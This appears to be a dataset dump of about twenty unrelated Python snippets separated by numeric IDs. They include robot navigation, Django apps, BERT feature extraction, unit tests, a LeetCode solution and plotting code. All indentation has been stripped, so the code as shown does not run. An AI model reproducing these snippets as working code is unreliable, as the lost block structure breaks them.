def _go_to_relative_pose(self, rel_x, rel_y, abs_yaw):
# clip relative movements smaller than 10 micrometers to zero;
# this is done to improve determinism, as habitat-sim doesn't
# seem to move the robot precisely at sub-millimeter scales anyway
if abs(rel_x) < 1e-5:
rel_x = 0
if abs(rel_y) < 1e-5:
rel_y = 0
if math.sqrt(rel_x ** 2 + rel_y ** 2) > 0.0:
# rotate to point to (x, y) point
action_name = "turn_left"
if rel_y < 0.0:
action_name = "turn_right"
v1 = np.asarray([1, 0], dtype=np.float64)
v2 = np.asarray([rel_x, rel_y], dtype=np.float64)
cosine_angle = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))
angle = np.arccos(cosine_angle)
did_collide = self._act(action_name, math.degrees(angle))
if did_collide:
print("Error: Collision accured while 1st rotating!")
return False
# move to (x,y) point
did_collide = self._act("move_forward", math.sqrt(rel_x ** 2 + rel_y ** 2))
if did_collide:
print("Error: Collision accured while moving straight!")
return False
# rotate to match the final yaw!
(cur_x, cur_y, cur_yaw) = self.get_state()
rel_yaw = abs_yaw - cur_yaw
# clip to micro-degree precision to preserve determinism
if abs(rel_yaw) < 1e-4:
rel_yaw = 0
action_name = "turn_left"
if rel_yaw < 0.0:
action_name = "turn_right"
rel_yaw *= -1
did_collide = self._act(action_name, math.degrees(rel_yaw))
if did_collide:
print("Error: Collision accured while rotating!")
return False
return True
def track_trajectory(self, states, controls, close_loop):
"""
State trajectory that the robot should track.
:param states: sequence of (x,y,t) states that the robot should track.
:param controls: optionally specify control sequence as well.
:param close_loop: whether to close loop on the
computed control sequence or not.
:type states: list
:type controls: list
:type close_loop: bool
:return: True if successful; False otherwise (timeout, etc.)
:rtype: bool
"""
raise NotImplementedError
|
15148
|
class BaseHandler:
def send(self, data, p):
pass
def recv(self, data, p):
pass
def shutdown(self, p, direction=2):
pass
def close(self):
pass
|
15187
|
import os
from os.path import dirname
from unittest import TestCase
import src.superannotate as sa
class TestCloneProject(TestCase):
PROJECT_NAME_1 = "test create from full info1"
PROJECT_NAME_2 = "test create from full info2"
PROJECT_DESCRIPTION = "desc"
PROJECT_TYPE = "Vector"
TEST_FOLDER_PATH = "data_set/sample_project_vector"
@property
def folder_path(self):
return os.path.join(dirname(dirname(__file__)), self.TEST_FOLDER_PATH)
@property
def classes_json(self):
return f"{self.folder_path}/classes/classes.json"
def setUp(self, *args, **kwargs):
self.tearDown()
self._project_1 = sa.create_project(
self.PROJECT_NAME_1, self.PROJECT_DESCRIPTION, self.PROJECT_TYPE
)
def tearDown(self) -> None:
sa.delete_project(self.PROJECT_NAME_1)
sa.delete_project(self.PROJECT_NAME_2)
def test_clone_contributors_and_description(self):
team_users = sa.search_team_contributors()
sa.share_project(self.PROJECT_NAME_1, team_users[0], "QA")
first_project_metadata = sa.get_project_metadata(
self.PROJECT_NAME_1, include_contributors=True
)
first_project_contributors = first_project_metadata["contributors"]
sa.clone_project(self.PROJECT_NAME_2, self.PROJECT_NAME_1, "DESCRIPTION", copy_contributors=True)
second_project_metadata = sa.get_project_metadata(
self.PROJECT_NAME_2, include_contributors=True
)
second_project_contributors = second_project_metadata["contributors"]
self.assertEqual(first_project_contributors[0]["user_id"], second_project_contributors[0]["user_id"])
self.assertEqual("DESCRIPTION", second_project_metadata["description"])
|
15194
|
import pytest
def vprintf_test(vamos):
if vamos.flavor == "agcc":
pytest.skip("vprintf not supported")
vamos.run_prog_check_data("vprintf")
|
15203
|
from django.conf.urls import patterns, url, include
from django.contrib import admin
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from .views import template_test
urlpatterns = patterns(
'',
url(r'^test/', template_test, name='template_test'),
url(r'^test2/', include('testapp.another_urls', namespace='foo', app_name='faa'))
)
admin.autodiscover()
urlpatterns += patterns(
'',
url(r'^admin/', include(admin.site.urls)),
)
if settings.DEBUG:
urlpatterns += staticfiles_urlpatterns()
import debug_toolbar
urlpatterns += patterns(
'',
url(r'^__debug__/', include(debug_toolbar.urls)),
)
|
15208
|
import pytest
from rlo import factory
@pytest.mark.parametrize("use_subtree_match_edges", [True, False])
@pytest.mark.parametrize("loss", ["pinball=0.6", "huber"])
def test_torch_model_from_config(use_subtree_match_edges, loss):
# Check we can construct a Model
config = {
"num_embeddings": 3,
"hidden_dim": 2,
"num_gnn_blocks": 5,
"output_hidden_dim": 2,
"simulation_depth_train": 10,
"lr": 0.01,
"loss": loss,
"repetition": 1,
"decoder_readout": "sum",
"graph_state_keep_prob": 0.9,
"output_keep_prob": 0.2,
"aggregation_over_edge_types": "sum",
"use_subtree_match_edges": use_subtree_match_edges,
}
factory.torch_model_from_config(config)
@pytest.mark.parametrize("use_subtree_match_edges", [True, False])
def test_torch_data_converter_from_config(use_subtree_match_edges):
# Check we can construct a DataConverter
config = {
"simulation_depth_train": 11,
"use_subtree_match_edges": use_subtree_match_edges,
"cost_normalization": "none",
}
factory.data_converter_from_config(config)
@pytest.mark.parametrize("use_subtree_match_edges", [True, False])
@pytest.mark.parametrize("loss", ["pinball=0.3", "huber"])
def test_torch_regressor_from_config(use_subtree_match_edges, loss):
# Check we can construct a TorchModelWrapper
config = {
"num_embeddings": 3,
"hidden_dim": 2,
"num_gnn_blocks": 5,
"output_hidden_dim": 2,
"lr": 0.01,
"loss": loss,
"repetition": 1,
"use_subtree_match_edges": use_subtree_match_edges,
"cost_normalization": "none",
"tensorflow": False,
"simulation_depth_eval": 10,
"decoder_readout": "sum",
"graph_state_keep_prob": 0.99,
"output_keep_prob": 0.2,
"aggregation_over_edge_types": "sum",
"simulation_depth_train": 10,
}
factory.single_regressor_from_config(config)
|
15269
|
import csv
import os
import shutil
from datetime import datetime
from grid import *
#from cluster import *
from regions import *
start_time = datetime.now()
print("Allocating...")
#grid2
#gridSystem = GridSystem(-74.04, -73.775, 5, 40.63, 40.835, 5)
#gridname = "grid2"
#grid3
#gridSystem = GridSystem(-74.02, -73.938, 4, 40.7, 40.815, 6)
#gridname = "grid3"
#cluster1
#gridSystem = ClusterSystem("cluster1/clusters.csv")
#gridname = "cluster1"
gridSystem = RegionSystem("4year_features")
gridname = "region1"
invalids = 0
for y in ["FOIL2010", "FOIL2011", "FOIL2012", "FOIL2013"]:
for n in range(1,13):
filename = "../../new_chron/" + y + "/trip_data_" + str(n) + ".csv"
print("Reading file " + filename)
r = csv.reader(open(filename, "r"))
i = 0
header = True
for line in r:
if(header):
Trip.initHeader(line)
header = False
else:
trip = None
try:
trip = Trip(line)
except ValueError:
invalids += 1
if(trip != None and (y != "FOIL" + str(trip.date.year) or n != trip.date.month)):
trip.has_other_error = True
gridSystem.record(trip)
i += 1
if(i%1000000==0):
print("Read " + str(i) + " rows")
gridSystem.close()
end_time = datetime.now()
program_duration = end_time - start_time
print("Processing took " + str(program_duration))
|
15278
|
from lib import action
class RGBAction(action.BaseAction):
def run(self, light_id, red, green, blue, transition_time):
light = self.hue.lights.get(light_id)
light.rgb(red, green, blue, transition_time)
|
15290
|
from collections import defaultdict, namedtuple
import torch
# When using the sliding window trick for long sequences,
# we take the representation of each token with maximal context.
# Take average of the BERT embeddings of these BPE sub-tokens
# as the embedding for the word.
# Take *weighted* average of the word embeddings through all layers.
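# Hedged illustration of the sub-token averaging described above (hypothetical
# tensors, independent of the functions below): a word split into the BPE
# pieces ["play", "##ing"] gets the mean of its sub-token vectors, e.g.
#   torch.tensor([[1.0, 3.0], [3.0, 5.0]]).mean(dim=0)  ->  tensor([2., 4.])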
def extract_bert_ques_hidden_states(all_encoder_layers, max_doc_len, features, weighted_avg=False):
num_layers, batch_size, turn_size, num_chunk, max_token_len, bert_dim = all_encoder_layers.shape
out_features = torch.Tensor(num_layers, batch_size, turn_size, max_doc_len, bert_dim).fill_(0)
device = all_encoder_layers.get_device() if all_encoder_layers.is_cuda else None
if device is not None:
out_features = out_features.to(device)
token_count = []
# Map BERT tokens to doc words
for i, ex_feature in enumerate(features): # Example
ex_token_count = []
for t, para_feature in enumerate(ex_feature): # Turn
para_token_count = defaultdict(int)
for j, chunk_feature in enumerate(para_feature): # Chunk
for k in chunk_feature.token_is_max_context: # Token
if chunk_feature.token_is_max_context[k]:
doc_word_idx = chunk_feature.token_to_orig_map[k]
out_features[:, i, t, doc_word_idx] += all_encoder_layers[:, i, t, j, k]
para_token_count[doc_word_idx] += 1
ex_token_count.append(para_token_count)
token_count.append(ex_token_count)
for i, ex_token_count in enumerate(token_count):
for t, para_token_count in enumerate(ex_token_count):
for doc_word_idx, count in para_token_count.items():
out_features[:, i, t, doc_word_idx] /= count
# Average through all layers
if not weighted_avg:
out_features = torch.mean(out_features, 0)
return out_features
def extract_bert_ctx_hidden_states(all_encoder_layers, max_doc_len, features, weighted_avg=False):
num_layers, batch_size, num_chunk, max_token_len, bert_dim = all_encoder_layers.shape
out_features = torch.Tensor(num_layers, batch_size, max_doc_len, bert_dim).fill_(0)
device = all_encoder_layers.get_device() if all_encoder_layers.is_cuda else None
if device is not None:
out_features = out_features.to(device)
token_count = []
# Map BERT tokens to doc words
for i, ex_feature in enumerate(features): # Example
ex_token_count = defaultdict(int)
for j, chunk_feature in enumerate(ex_feature): # Chunk
for k in chunk_feature.token_is_max_context: # Token
if chunk_feature.token_is_max_context[k]:
doc_word_idx = chunk_feature.token_to_orig_map[k]
out_features[:, i, doc_word_idx] += all_encoder_layers[:, i, j, k]
ex_token_count[doc_word_idx] += 1
token_count.append(ex_token_count)
for i, ex_token_count in enumerate(token_count):
for doc_word_idx, count in ex_token_count.items():
out_features[:, i, doc_word_idx] /= count
# Average through all layers
if not weighted_avg:
out_features = torch.mean(out_features, 0)
return out_features
def convert_text_to_bert_features(text, bert_tokenizer, max_seq_length, doc_stride):
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
tok_to_orig_index = []
all_doc_tokens = []
for (i, token) in enumerate(text):
sub_tokens = bert_tokenizer.wordpiece_tokenizer.tokenize(token.lower())
for sub_ in sub_tokens:
tok_to_orig_index.append(i)
all_doc_tokens.append(sub_)
# The -2 accounts for [CLS] and [SEP]
max_tokens_for_doc = max_seq_length - 2
# We can have documents that are longer than the maximum sequence length.
# To deal with this we do a sliding window approach, where we take chunks
# of the up to our max length with a stride of `doc_stride`.
_DocSpan = namedtuple( # pylint: disable=invalid-name
"DocSpan", ["start", "length"])
doc_spans = []
start_offset = 0
while start_offset < len(all_doc_tokens):
length = len(all_doc_tokens) - start_offset
if length > max_tokens_for_doc:
length = max_tokens_for_doc
doc_spans.append(_DocSpan(start=start_offset, length=length))
if start_offset + length == len(all_doc_tokens):
break
start_offset += min(length, doc_stride)
out_features = []
for (doc_span_index, doc_span) in enumerate(doc_spans):
tokens = []
token_to_orig_map = {}
token_is_max_context = {}
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for i in range(doc_span.length):
split_token_index = doc_span.start + i
token_to_orig_map[len(tokens)] = tok_to_orig_index[split_token_index]
is_max_context = _check_is_max_context(doc_spans, doc_span_index,
split_token_index)
token_is_max_context[len(tokens)] = is_max_context
tokens.append(all_doc_tokens[split_token_index])
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
input_ids = bert_tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
feature = BertInputFeatures(
doc_span_index=doc_span_index,
tokens=tokens,
token_to_orig_map=token_to_orig_map,
token_is_max_context=token_is_max_context,
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids)
out_features.append(feature)
return out_features
def _check_is_max_context(doc_spans, cur_span_index, position):
"""Check if this is the 'max context' doc span for the token."""
# Because of the sliding window approach taken to scoring documents, a single
# token can appear in multiple documents. E.g.
# Doc: the man went to the store and bought a gallon of milk
# Span A: the man went to the
# Span B: to the store and bought
# Span C: and bought a gallon of
# ...
#
# Now the word 'bought' will have two scores from spans B and C. We only
# want to consider the score with "maximum context", which we define as
# the *minimum* of its left and right context (the *sum* of left and
# right context will always be the same, of course).
#
# In the example the maximum context for 'bought' would be span C since
# it has 1 left context and 3 right context, while span B has 4 left context
# and 0 right context.
best_score = None
best_span_index = None
for (span_index, doc_span) in enumerate(doc_spans):
end = doc_span.start + doc_span.length - 1
if position < doc_span.start:
continue
if position > end:
continue
num_left_context = position - doc_span.start
num_right_context = end - position
score = min(num_left_context, num_right_context) + 0.01 * doc_span.length
if best_score is None or score > best_score:
best_score = score
best_span_index = span_index
return cur_span_index == best_span_index
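# Hedged worked example of the scoring above (hypothetical spans): in
# "the man went to the store and bought a gallon of milk", 'bought' is doc
# position 7 and spans A/B/C are (start=0, length=5), (3, 5), (6, 5):
#   span B: min(left=4, right=0) + 0.01 * 5 = 0.05
#   span C: min(left=1, right=3) + 0.01 * 5 = 1.05  -> span C wins
# so _check_is_max_context(spans, 2, 7) is True and it is False for A and B.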
class BertInputFeatures(object):
"""A single set of BERT features of data."""
def __init__(self,
doc_span_index,
tokens,
token_to_orig_map,
token_is_max_context,
input_ids,
input_mask,
segment_ids):
self.doc_span_index = doc_span_index
self.tokens = tokens
self.token_to_orig_map = token_to_orig_map
self.token_is_max_context = token_is_max_context
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
|
15317
|
from django.db import models
from django.contrib.auth.models import User
class Link(models.Model):
url = models.URLField()
title = models.CharField(max_length=255)
reporter = models.ForeignKey(
User,
on_delete=models.SET_NULL,
related_name='reported_links',
null=True,
blank=False,
)
def __str__(self):
return '{self.title} ({self.url})'.format(self=self)
def get_num_of_positive_votes(self):
return self.votes.filter(positive=True).count()
def get_num_of_negative_votes(self):
return self.votes.filter(negative=True).count()
class LinkVote(models.Model):
class Meta:
unique_together = (
('link', 'voter'),
)
link = models.ForeignKey(
Link,
on_delete=models.CASCADE,
related_name='votes',
)
voter = models.ForeignKey(
User,
on_delete=models.SET_NULL,
related_name='votes',
null=True,
blank=False,
)
positive = models.BooleanField()
negative = models.BooleanField()
def __str__(self):
if self.positive:
vote = 'positive'
elif self.negative:
vote = 'negative'
else:
vote = 'neutral'
return '{vote} vote for {self.link} by {self.voter}'.format(
vote=vote, self=self)
|
15319
|
from prometheus_client import Counter
from raiden.utils.typing import TokenAmount
from raiden_libs.metrics import ( # noqa: F401, pylint: disable=unused-import
ERRORS_LOGGED,
EVENTS_EXCEPTIONS_RAISED,
EVENTS_PROCESSING_TIME,
MESSAGES_EXCEPTIONS_RAISED,
MESSAGES_PROCESSING_TIME,
REGISTRY,
ErrorCategory,
MetricsEnum,
collect_event_metrics,
collect_message_metrics,
get_metrics_for_label,
)
class Who(MetricsEnum):
US = "us"
THEY = "they"
REWARD_CLAIMS = Counter(
"economics_reward_claims_successful_total",
"The number of overall successful reward claims",
labelnames=[Who.label_name()],
registry=REGISTRY,
)
REWARD_CLAIMS_TOKEN = Counter(
"economics_reward_claims_token_total",
"The amount of token earned by reward claims",
labelnames=[Who.label_name()],
registry=REGISTRY,
)
def report_increased_reward_claims(amount: TokenAmount, who: Who) -> None:
get_metrics_for_label(REWARD_CLAIMS, who).inc()
get_metrics_for_label(REWARD_CLAIMS_TOKEN, who).inc(float(amount))
|
15346
|
from pathlib import Path
import shutil
import unittest
import numpy as np
import siml.optimize as optimize
import siml.setting as setting
class TestOptimize(unittest.TestCase):
def test_generate_dict(self):
main_setting = setting.MainSetting.read_settings_yaml(
Path('tests/data/deform/optuna.yml'))
objective = optimize.Objective(main_setting, None)
dict_replace_1 = {
'inputs': [{'name': 'abc', 'dim': 6}],
'n_node': 35,
'hidden_layers': 11,
'dropout': 0.01}
replaced_setting_1 = objective._generate_dict(
main_setting.optuna.setting, dict_replace_1)
dict_replace_2 = {
'inputs': [
{'name': 'elemental_strain', 'dim': 6},
{'name': 'something', 'dim': 100}],
'n_node': 135,
'hidden_layers': 111,
'dropout': 0.11}
replaced_setting_2 = objective._generate_dict(
main_setting.optuna.setting, dict_replace_2)
self.assertEqual(
replaced_setting_1['trainer']['inputs'][0]['name'],
'abc')
self.assertEqual(
replaced_setting_2['trainer']['inputs'][0]['name'],
'elemental_strain')
self.assertEqual(
replaced_setting_2['trainer']['inputs'][1]['name'],
'something')
self.assertEqual(
replaced_setting_2['model']['blocks'][0]['hidden_nodes'], 135)
self.assertEqual(
replaced_setting_2['model']['blocks'][0]['hidden_layers'], 111)
self.assertEqual(
replaced_setting_2['model']['blocks'][0]['hidden_dropout'], 0.11)
def test_perform_study(self):
main_setting = setting.MainSetting.read_settings_yaml(
Path('tests/data/deform/optuna.yml'))
if main_setting.optuna.output_base_directory.exists():
shutil.rmtree(main_setting.optuna.output_base_directory)
study = optimize.Study(main_setting)
study.perform_study()
self.assertLess(
study.study.best_trial.value,
np.max([t.value for t in study.study.trials]))
def test_perform_study_step_by_step(self):
main_setting_yml = Path('tests/data/deform/optuna.yml')
main_setting = setting.MainSetting.read_settings_yaml(
main_setting_yml)
if main_setting.optuna.output_base_directory.exists():
shutil.rmtree(main_setting.optuna.output_base_directory)
db_setting = setting.DBSetting(use_sqlite=True)
study = optimize.Study(main_setting, db_setting, step_by_step=True)
for _ in range(3):
try:
study.perform_study()
except SystemExit:
continue
self.assertEqual(len(study.study.get_trials()), 3)
|
15354
|
from fastapi import Depends, HTTPException, Path, status
from pydantic import UUID4
from api.dependencies.database import get_repository
from db.errors import EntityDoesNotExist, ResourceIsNotDeployed
from db.repositories.user_resources import UserResourceRepository
from db.repositories.workspace_services import WorkspaceServiceRepository
from db.repositories.workspaces import WorkspaceRepository
from models.domain.user_resource import UserResource
from models.domain.workspace import Workspace
from models.domain.workspace_service import WorkspaceService
from resources import strings
def get_workspace_by_id(workspace_id: UUID4, workspaces_repo) -> Workspace:
try:
return workspaces_repo.get_workspace_by_id(workspace_id)
except EntityDoesNotExist:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=strings.WORKSPACE_DOES_NOT_EXIST)
async def get_workspace_by_id_from_path(workspace_id: UUID4 = Path(...), workspaces_repo=Depends(get_repository(WorkspaceRepository))) -> Workspace:
return get_workspace_by_id(workspace_id, workspaces_repo)
async def get_deployed_workspace_by_id_from_path(workspace_id: UUID4 = Path(...), workspaces_repo=Depends(get_repository(WorkspaceRepository))) -> Workspace:
try:
return workspaces_repo.get_deployed_workspace_by_id(workspace_id)
except EntityDoesNotExist:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=strings.WORKSPACE_DOES_NOT_EXIST)
except ResourceIsNotDeployed:
raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail=strings.WORKSPACE_IS_NOT_DEPLOYED)
async def get_workspace_service_by_id_from_path(workspace_id: UUID4 = Path(...), service_id: UUID4 = Path(...), workspace_services_repo=Depends(get_repository(WorkspaceServiceRepository))) -> WorkspaceService:
try:
return workspace_services_repo.get_workspace_service_by_id(workspace_id, service_id)
except EntityDoesNotExist:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=strings.WORKSPACE_SERVICE_DOES_NOT_EXIST)
async def get_deployed_workspace_service_by_id_from_path(workspace_id: UUID4 = Path(...), service_id: UUID4 = Path(...), workspace_services_repo=Depends(get_repository(WorkspaceServiceRepository))) -> WorkspaceService:
try:
return workspace_services_repo.get_deployed_workspace_service_by_id(workspace_id, service_id)
except EntityDoesNotExist:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=strings.WORKSPACE_SERVICE_DOES_NOT_EXIST)
except ResourceIsNotDeployed:
raise HTTPException(status_code=status.HTTP_409_CONFLICT, detail=strings.WORKSPACE_SERVICE_IS_NOT_DEPLOYED)
async def get_user_resource_by_id_from_path(workspace_id: UUID4 = Path(...), service_id: UUID4 = Path(...), resource_id: UUID4 = Path(...), user_resource_repo=Depends(get_repository(UserResourceRepository))) -> UserResource:
try:
return user_resource_repo.get_user_resource_by_id(workspace_id, service_id, resource_id)
except EntityDoesNotExist:
raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=strings.USER_RESOURCE_DOES_NOT_EXIST)
|
15427
|
from typing import List
class Solution:
def findOcurrences(self, text: str, first: str, second: str) -> List[str]:
ls = text.split()
return [c for a, b, c in zip(ls, ls[1:], ls[2:]) if a == first and b == second]
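# Hedged usage check (sample input from the "occurrences after bigram" problem):
if __name__ == "__main__":
    print(Solution().findOcurrences(
        "alice is a good girl she is a good student", "a", "good"))
    # -> ['girl', 'student']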
|
15505
|
import unittest
from katas.kyu_7.binary_addition import add_binary
class AddBinaryTestCase(unittest.TestCase):
def test_equals(self):
self.assertEqual(add_binary(1, 1), '10')
def test_equals_2(self):
self.assertEqual(add_binary(0, 1), '1')
def test_equals_3(self):
self.assertEqual(add_binary(1, 0), '1')
def test_equals_4(self):
self.assertEqual(add_binary(2, 2), '100')
def test_equals_5(self):
self.assertEqual(add_binary(51, 12), '111111')
|
15516
|
import random
import numpy as np
import operator
from scipy import optimize
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg
from matplotlib.figure import Figure as MatplotlibFigure
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm as color_map
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import interface.auxiliary_functions as auxi
import dictionaries.constants as cs
#################################################################################
class ResultsCanvas(FigureCanvasQTAgg):
def __init__(self, canvas_ref, vip):
self._Figure = MatplotlibFigure(figsize = cs.FIG_SIZE, dpi = cs.DPI)#, tight_layout=True, frameon=True)
super(ResultsCanvas, self).__init__(self._Figure)
self.update_figure(canvas_ref, vip)
def _from_options(self, canvas_ref, vip):
self.Axes.set_position(self._get_axes_position(vip))
labels_x = self.Axes.xaxis.get_ticklabels()
labels_y = self.Axes.yaxis.get_ticklabels()
fontsize = vip.get('Options', 'R_axes_font_size')
angle = vip.get('Options', 'R_x_plot_label_rotation')
for label in labels_x+labels_y:
label.set_fontsize(fontsize)
if vip.get(canvas_ref, 'F_plot_function') == 'density':
for label in labels_x:
label.set_rotation(angle)
def _get_axes_position(self, vip):
session_keys = ['R_x_plot_position', 'R_y_plot_position', 'R_x_plot_size', 'R_y_plot_size']
f = lambda k: float(vip.get('Options', k))
return map(f, session_keys)
#################################################################################
class Canvas2dData(ResultsCanvas):
def __init__(self, canvas_ref, vip):
super(Canvas2dData, self).__init__(canvas_ref, vip)
def update_figure(self, canvas_ref, vip):
self._Figure.clear()
#from numpy.random import rand
#x, y, c, s = rand(4, 100)
#def onpick3(event):
# ind = event.ind
# print 'onpick3 scatter:', ind, np.take(x_axis, ind), np.take(y_axis, ind)
#self._Figure.canvas.mpl_connect('pick_event', onpick3)
try:
data_set = vip.get(canvas_ref, 'F_data_set')
plot_data2D = vip.plot_data[data_set]['2d_data']
########## Axes
self.Axes = self._Figure.add_axes(cs.AXES_POSITION_INIT)
x_axis = plot_data2D['axis_1']
y_axis = plot_data2D['axis_r']
self.Axes.plot(x_axis, y_axis, auxi.colour(cs.PLOT_COLOR_RANGE))
#self.Axes.set_xlim([x_axis[0], x_axis[-1]])
self.Axes.set_xlim(sorted([x_axis[0], x_axis[-1]]))
self._from_options(canvas_ref, vip)
self.Axes.set_xlabel(plot_data2D['label_1'])
self.Axes.set_ylabel(plot_data2D['label_r'])
#self.Axes.hold(False)
########## Extrema
#max_index, max_y = max(enumerate(y_axis), key=operator.itemgetter(1))
#vip.maximal_x = x_axis[max_index]
min_index, min_y = min(enumerate(y_axis), key=operator.itemgetter(1))
vip.minimal_x = x_axis[min_index]
print "* GLOBAL MINIMUM:\n{0}".format(vip.minimal_x)
if canvas_ref in ['Plot_column_1']:
########## Savitzky Golay Filter
ws = len(y_axis)/cs.SAVITZKY_GOLAY_FILTER_RANGE_DENOMINATOR
ws = ws if (ws % 2 == 1) else (ws + 1)
try:
y_axis_sg = auxi.savitzky_golay_filter(y_axis, window_size=ws, order=cs.SAVITZKY_GOLAY_FILTER_ORDER)
self.Axes.plot(x_axis, y_axis_sg, cs.FILTER_CURVE_STYLE, linewidth=cs.FILTER_LINEWIDTH)
except TypeError as exception:
print "! (update_figure) couldn't compute 'savitzky_golay_filter':"
print exception
########## Fit
try:
def lorenzian_fit(x, A, k, ke):
"""Take min_x of this session and define a fit function"""
def h(ke_):
return (k / 2 - ke_)**2 + (x - vip.minimal_x)**2
r = A * h(ke) / h(0)
return auxi.to_dB(r)
parameters, covariance = optimize.curve_fit(lorenzian_fit, x_axis, y_axis_sg)
LINE = 40 * "." + "\n"
print LINE
print "LORENZIAN FIT AT FILTER CUVE MINIMUM:\n"
print "* PARAMETERS:\n\n [A, kappa, kappa_e]\n= {0}\n".format(parameters)
print "* PARAMETERS:\n\n kappa_e / kappa\n= {0}\n" .format(parameters[1] / parameters[0])
print "* COVARIANCE:\n\n Matrix\n= {0}\n" .format(covariance)
print "* MINIMUM: \n\n (x,y)\n= ({0}, {1})\n" .format(x_axis[min_index], y_axis[min_index])
print LINE
fit_function = lambda x: lorenzian_fit(x, *parameters)
y_axis_fit = map(fit_function, x_axis)
self.Axes.plot(x_axis, y_axis_fit, cs.FITTING_CURVE_STYLE, linewidth=cs.FITTING_LINEWIDTH, linestyle=cs.FITTING_LINESTYLE)
except:
print "! (update_figure) couldn't fit to lorenzian_fit."
else:
pass
try:
self.draw()
except ValueError:
message = "! (update_figure, ValueError) at vip.draw."
vip.GUI_feedback(message)
except KeyError:
message = "! (update_figure) The specified dataset might not exist."
vip.GUI_feedback(message)
#################################################################################
class Canvas3dData(ResultsCanvas):
def __init__(self, canvas_ref, vip):
super(Canvas3dData, self).__init__(canvas_ref, vip)
def update_figure(self, canvas_ref, vip):
self._Figure.clear()
try:
data_set = vip.get(canvas_ref, 'F_data_set')
plot_data3D = vip.plot_data[data_set]['3d_data']
########## Axes
X, Y = np.meshgrid(plot_data3D['axis_1'], plot_data3D['axis_2'])
Z = np.array(plot_data3D['axis_r'])
if vip.get(canvas_ref, 'F_plot_function') == 'density':
self.Axes = self._Figure.add_axes(cs.AXES_POSITION_INIT)
self.Axes.pcolormesh(X, Y, Z, cmap = color_map.coolwarm)
elif vip.get(canvas_ref, 'F_plot_function') == 'surface':
self.Axes = Axes3D(self._Figure)
surf = self.Axes.plot_surface(X, Y, Z, cmap = color_map.coolwarm, rstride = 1, cstride = 1, linewidth = 0.15, antialiased = False)
self.Axes.zaxis.set_major_locator(LinearLocator(10))
self.Axes.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))
#self.Axes.set_zlim(-1.01, 1.01)
position_color_bar = [0.015, 0.17, 0.015, 0.75]
Axes_color_bar = self._Figure.add_axes(position_color_bar)
self._Figure.colorbar(surf, cax = Axes_color_bar)
self._from_options(canvas_ref, vip)
#self.Axes.hold(False)
self.Axes.set_xlabel(plot_data3D['label_1'])
self.Axes.set_ylabel(plot_data3D['label_2'])
########## / Axes
try:
self.draw()
except ValueError:
message = "(update_figure, vip.draw, ValueError)"
vip.GUI_feedback(message)
except KeyError:
message = "The specified dataset might not exist"
vip.GUI_feedback(message)
|
15555
|
import os
from .default import DefaultModelConfig
class ModelConfig(DefaultModelConfig):
def __init__(self):
super().__init__()
self.MODEL_NAME = 'AOTT'
|
15563
|
print(list(range(10, 0, -2)))
# if start > end and step > 0:
# an empty list is generated
# if start > end and step < 0:
# a list is generated from start down towards end (end excluded), with step as a constant decrement
# if start < end and step > 0:
# a list is generated from start up towards end (end excluded), with step as a constant increment
# if start < end and step < 0:
# an empty list is generated
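# The four cases above, demonstrated (illustrative additions, not part of the original snippet):
print(list(range(10, 0, 2)))    # start > end, step > 0 -> []
print(list(range(10, 0, -2)))   # start > end, step < 0 -> [10, 8, 6, 4, 2]
print(list(range(0, 10, 2)))    # start < end, step > 0 -> [0, 2, 4, 6, 8]
print(list(range(0, 10, -2)))   # start < end, step < 0 -> []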
|
15592
|
from pgdrive.component.blocks.curve import Curve
from pgdrive.component.blocks.first_block import FirstPGBlock
from pgdrive.component.blocks.std_t_intersection import StdTInterSection
from pgdrive.component.blocks.straight import Straight
from pgdrive.component.road.road_network import RoadNetwork
from pgdrive.tests.vis_block.vis_block_base import TestBlock
if __name__ == "__main__":
test = TestBlock(True)
from pgdrive.engine.asset_loader import initialize_asset_loader
initialize_asset_loader(test)
global_network = RoadNetwork()
first = FirstPGBlock(global_network, 3.0, 2, test.render, test.world, 1)
curve = Curve(1, first.get_socket(0), global_network, 1)
curve.construct_block(test.render, test.world)
straight = Straight(2, curve.get_socket(0), global_network, 1)
straight.construct_block(test.render, test.world)
intersection = StdTInterSection(3, straight.get_socket(0), global_network, 1)
print(intersection.construct_block(test.render, test.world))
id = 4
for socket_idx in range(intersection.SOCKET_NUM):
block = Curve(id, intersection.get_socket(socket_idx), global_network, id + 1)
block.construct_block(test.render, test.world)
id += 1
test.show_bounding_box(global_network)
test.run()
|
15638
|
from foolbox import zoo
import numpy as np
import foolbox
import sys
import pytest
from foolbox.zoo.model_loader import ModelLoader
from os.path import join, dirname
@pytest.fixture(autouse=True)
def unload_foolbox_model_module():
# reload foolbox_model from scratch for every run
# to ensure atomic tests without side effects
module_names = ["foolbox_model", "model"]
for module_name in module_names:
if module_name in sys.modules:
del sys.modules[module_name]
test_data = [
# private repo won't work on travis
# ('https://github.com/bethgelab/AnalysisBySynthesis.git', (1, 28, 28)),
# ('https://github.com/bethgelab/convex_adversarial.git', (1, 28, 28)),
# ('https://github.com/bethgelab/mnist_challenge.git', 784)
(join("file://", dirname(__file__), "data/model_repo"), (3, 224, 224))
]
@pytest.mark.parametrize("url, dim", test_data)
def test_loading_model(url, dim):
# download model
model = zoo.get_model(url)
# create a dummy image
x = np.zeros(dim, dtype=np.float32)
